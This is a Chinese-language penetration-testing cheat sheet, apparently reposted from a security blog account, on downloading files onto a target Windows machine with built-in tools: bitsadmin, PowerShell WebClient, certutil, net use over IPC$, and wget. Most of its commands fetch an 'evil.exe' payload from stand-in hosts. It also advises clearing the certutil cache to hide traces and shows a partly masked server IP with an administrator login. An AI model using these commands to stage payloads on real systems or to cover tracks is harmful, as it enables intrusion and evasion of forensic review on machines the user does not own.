核心思想为不能使用要求过高, 最好是windows原生就有的, 或是使用非常方便的才记录在此
使用方法:
bitsadmin /transfer n '下载地址' '保存地址'
例子-下载在某个地方
bitsadmin /transfer n http://baidu.com/evil-exe.txt C:\Users\miao\Desktop\evil.exe
下载完毕以后 C:\Users\miao\Desktop\ 就会出现个 evil.exe
使用方法: powershell (new-object System.Net.WebClient).DownloadFile('下载地址',['保存地址'])
例子-下载在某个地方:
powershell (new-object System.Net.WebClient).DownloadFile('http://test.com/evil-exe.txt','C:\evil.exe')
下载完毕以后 C盘 根目录就会出现个 evil.exe
例子-下载在当前路径:
powershell (new-object System.Net.WebClient).DownloadFile('http://test.com/evil-exe.txt','evil.exe')
下载完毕以后, 当前程序执行的路径在哪里文件就会保存在哪里
例如现在程序执行的路径是 C:\Users\ 那么下载的文件就会保存在 C:\Users\ 这个目录下面
注意: 由于使用certutil下载文件会留下缓存,所以下载完文件以后强烈建议在删除对应的缓存
缓存目录地址: %USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
使用方法:
下载文件: certutil -urlcache -split -f '下载地址' ['保存地址']
删除缓存: certutil -urlcache -split -f '下载地址' delete
例子-下载在当前路径:
下载文件: certutil -urlcache -split -f http://test.com/evil-exe.txt evil.exe
删除缓存: certutil -urlcache -split -f http://test.com/evil-exe.txt delete
例子-下载在某个地方:
下载文件: certutil -urlcache -split -f http://test.com/evil-exe.txt C:\Users\evil.exe
删除缓存: certutil -urlcache -split -f http://test.com/evil-exe.txt delete
使用方法:
# 建立远程IPC连接
net use \\'vps-ip'\ipc$ /user:'账号' '密码'
# 复制远程文件到本地主机
copy \\'vps-ip'\'盘符'$\'下载地址' '保存地址'
windows-vps-环境
ip:220.181.38.***
账号:administrator
密码:****
现在这台vps的C:\Users\有个user.txt内容为test
例子-通过外网vps下载文件在本机当前路径
# 建立远程IPC连接
net use \\220.181.38.***\ipc$ /user:administrator ****
# 复制远程文件到本地主机
# 复制远程vps主机的文件到本机的当前路径下,执行成功以后,本机的当前路径就会出现一个test.txt文件
# 例如本机当前路径为:C:\Users\Administrator\Desktop
# 那么执行完下面这个命令以后就会在这个路径生成一个test.txt文件
copy \\220.181.38.***\c$\Users\test.txt
例子-通过外网vps下载文件在本机某个目录下
# 建立远程IPC连接
net use \\220.181.38.***\ipc$ /user:administrator ****
# 复制远程文件到本地主机
# 复制远程vps主机的文件到本机的C:\Windows\目录文件名叫test.exe
copy \\220.181.38.***\c$\Users\test.txt C:\Windows\test.exe
注:这个方法不是通用的,很多情况需要我们在目标机器上面下载个东西
wget这个有点骚,很多情况下需要我们自己上传个exe,不是很符合本文章,所以要看情况使用
windows2006会自带wget命令, 所以如果是windows2006那就不用上传wget.exe文件
直接使用 wget -O '保存地址' '下载地址' 下载文件 即可
如果有上传权限可以在目标机器上面上传个免安装的wget.exe执行程序到目标机器, 然后我们在下载文件
(注: 比较脑残我也不懂为什么有上传权限还要上传个wget.exe进行远程下载,但是指不定有人需要)
wget下载地址:https://eternallybored.org/misc/wget/
这里我也提供下载好的, 方便直接下载, zip文件里面有两个文件wget-64.exe与wget-32.exe请按自己实战需求使用
使用方法:
wget-64.exe -O '保存地址' '下载地址'
例子-下载在当前路径:
wget-64.exe -O "evil.exe" http://test.com/evil-exe.txt
例子-下载在某个地方:
wget-64.exe wget -O "C:\Users\evil.exe" http://baidu.com/evil-exe.txt
文章来源:白帽兔
【往期推荐】
【超详细 | Python】CS免杀-Shellcode Loader原理(python)
【超详细 | 钟馗之眼】ZoomEye-python命令行的使用
【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现
【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现
【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞
【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现
【奇淫巧技】如何成为一个合格的“FOFA”工程师
【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】
【漏洞速递+检测脚本 | CVE-2021-49104】泛微E-Office任意文件上传漏洞
走过路过的大佬们留个关注再走呗
往期文章有彩蛋哦
一如既往的学习,一如既往的整理,一如即往的分享
“如侵权请私聊公众号删文”
推荐阅读↓↓↓
我知道你在看哟